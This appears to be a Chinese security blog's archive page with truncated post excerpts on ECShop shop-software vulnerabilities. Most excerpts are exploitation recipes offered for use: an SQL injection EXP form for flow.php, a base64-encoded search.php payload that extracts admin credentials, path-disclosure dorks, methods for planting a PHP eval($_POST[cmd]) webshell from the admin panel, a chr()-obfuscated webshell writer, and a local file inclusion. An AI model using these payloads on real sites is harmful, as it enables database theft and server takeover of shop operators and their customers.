ECSHOP的flow页注入利用方法&EXP

分类:安全 | 2013-05-21 | 撸过 1,040 次
3人扯谈

利用办法:先注册.把任意商品加入购物车在填写配送地址那一页,有地区选择,随便选个地区,复制地址到exp下。
EXP:

<form name="form1" method="post">
ECSHOP通版本注入漏洞 简单EXP [ Silic Group Hacker Army ]<input name="country" type="text" style="display:none" value="1"/><br />
<textarea rows="5" style="font-family:Times New Roman;font-size:1[......]

继续阅读

ecshop 最新注入0day漏洞分析报告

分类:安全 | 2013-02-23 | 撸过 666 次
2人扯谈

漏洞作者:360

漏洞分析:Seay

博客:www.cnseay.com

 

今天习惯性的到处逛,看看文章。看到了360爆的一个ecshop 支付宝支付插件的注入漏洞,照例的分析下,360的团队还是挺赞的。

 

由于漏洞源于ecshop的支付宝支付插件,所有利用前提是站点安装此插件,利用不受GPC影响。

 

漏洞核心代码在includesmodulespaymentalipay.php 文件 respond()函数,第215行。[......]

继续阅读

ECShop全版本注入0day

分类:安全 | 2012-12-30 | 撸过 470 次
0人扯谈

先注册账户,随便选个商品进购物车,把任意商品加入购物车在填写配送地址那一页,有地区选择,然后填地址,电话什么的

flow.php?step=consignee&direct_shopping=1

比如省选择北京
其中POST数据如下

country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&[......]

继续阅读

ECShop v2.7.2 wap页面暴路径漏洞

分类:安全 | 2012-02-14 | 撸过 606 次
0人扯谈

谷歌百度一下:

inurl:mobile/goods.php?act=view_img&id=123

搜到后在页面加个&id=5
也就是

https://www.webshell.cc/mobile/goods.php?act=view_img&id=123&id=5

ecshop的48个泄露网站路径漏洞

分类:安全 | 2011-10-27 | 撸过 595 次
0人扯谈

http://www.webshell.cc/shop/api/cron.php
https://www.webshell.cc/shop/wap/goods.php
https://www.webshell.cc/shop/temp/compiled/ur_here.lbi.php
https://www.webshell.cc/shop/temp/compiled/pages.lbi.php
https://www.webshell.cc/shop/temp/compiled/user_transaction.dwt.php
https://www.webshell.cc/shop/temp/com[......]

继续阅读

ecshop后台拿shell 个人总结七种方法

分类:安全 | 2011-10-1 | 撸过 3,221 次
1人扯谈

最近想弄个ecshop做销售。装好ecshop V2.7.2版本之后,测试后台拿shell。

本人整理给自己看的,大家飘过就好。BY:黑猫

ecshop后台拿shell 个人总结七种方法

一、

系统==>数据库管理==>sql查询(可爆出物理路径):

==============创建表失败,导不出shell======================

show databases;
use 数据库名;
create a(cmd text not null);
insert into a(cmd) values('<?php eval($_POST[cmd]);?&[......]

继续阅读

ECSHOP 搜索注入漏洞出现错误的解决办法!

分类:安全 | 2011-09-23 | 撸过 501 次
0人扯谈

ECSHOP 利用网上的EXP:

search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319

 

 

返回:
MySQL server error rep[......]

继续阅读

ecshop后台获取shell最新方法,通杀最新版本&后台低权限

分类:安全 | 2011-08-26 | 撸过 940 次
1人扯谈

简要描述: 后台可以提交构造代码绕过过滤,成功解析生成一句话木马 防黑网。

详细说明:
<?php
$filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112);
$filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr[......]

继续阅读

ecshop最新版 (v272) 本地包含拿SHELL

分类:安全 | 2011-08-26 | 撸过 679 次
3人扯谈

直接看代码:
js/calendar.php

$lang = (!empty($_GET['lang']))
? trim($_GET['lang']) : ‘zh_cn’;//没有过滤,很明显的包含漏洞

if (!file_exists(‘../languages/’ . $lang . ‘/calendar.php’))
{
$lang = ‘zh_cn’;
}

require(dirname(dirname(__FILE__)) . ‘/data/config.php’);
header(‘Content-type: application/x-javascript; charse[......]

继续阅读